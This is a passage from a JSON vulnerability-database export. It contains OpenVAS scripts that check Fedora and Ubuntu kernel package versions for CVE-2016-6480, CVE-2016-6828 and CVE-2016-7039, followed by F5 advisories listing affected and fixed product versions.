exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.2~101.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-09-07T00:00:00", "id": "OPENVAS:1361412562310809207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809207", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-2e5ebfed6d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-2e5ebfed6d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809207\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-07 10:08:47 +0530 (Wed, 07 Sep 2016)\");\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-2e5ebfed6d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-2e5ebfed6d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BKRCZ4MFYMHSC2OUN27IALXPL5Y3PDJH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.7.2~201.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842909", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842909", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3099-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3099-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842909\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:27 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3099-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Vladimí r Beneš discovered an\n unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing\n implementations in the Linux kernel, A remote attacker could use this to cause\n a stack corruption, leading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. 
A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3099-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3099-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1030-snapdragon\", ver:\"4.4.0-1030.33\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842908", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842908", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3099-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3099-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842908\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:23 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3099-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Vladimí r Beneš discovered an\n unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing\n implementations in the Linux kernel, A remote attacker could use this to cause\n a stack corruption, leading to a denial of service (system crash). 
(CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3099-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3099-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1027-raspi2\", ver:\"4.4.0-1027.33\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842910", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310842910", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3099-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3099-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842910\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:31 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3099-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3099-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n 14.04 LTS.\n\nVladimí r Beneš discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). 
(CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3099-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3099-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-generic\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-generic-lpae\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-lowlatency\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc-e500mc\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc-smp\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc64-emb\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-4.4.0-42-powerpc64-smp\", ver:\"4.4.0-42.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:03", "bulletinFamily": "software", "cvelist": ["CVE-2016-6480"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not 
vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-12-20T20:32:00", "published": "2016-12-20T20:32:00", "href": "https://support.f5.com/csp/article/K37046163", "id": "F5:K37046163", "type": "f5", "title": "Kernel vulnerability CVE-2016-6480", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:40:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-6828"], "description": "\nF5 Product Development has assigned IDs 633655, 633656, and 624722 (BIG-IP), ID 633602 (BIG-IQ), ID 634365 (Enterprise Manager), and ID 634431 (F5 iWorkflow) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H635143 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | Linux kernel \nBIG-IP GTM | 11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 10.2.4 | 11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 \n10.2.1 - 
10.2.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 \n13.0.0 HF2 \n12.1.2 HF1 \n11.6.2 \n11.5.5 | Medium \n\n \n\n| Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 6.0.0 - 6.1.0 \n5.0.0 - 5.4.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to only trusted users. 
For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 15.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2020-03-24T09:43:00", "published": "2016-12-21T03:38:00", "id": "F5:K62442245", "href": "https://support.f5.com/csp/article/K62442245", "title": "Kernel vulnerability CVE-2016-6828", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T22:23:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-6136"], "description": "\nF5 Product Development has assigned IDs 648879 and 653065 (BIG-IP), ID 652525 (BIG-IQ), ID 652524 (Enterprise Manager), and ID 456789 (ARX) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H90803619 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 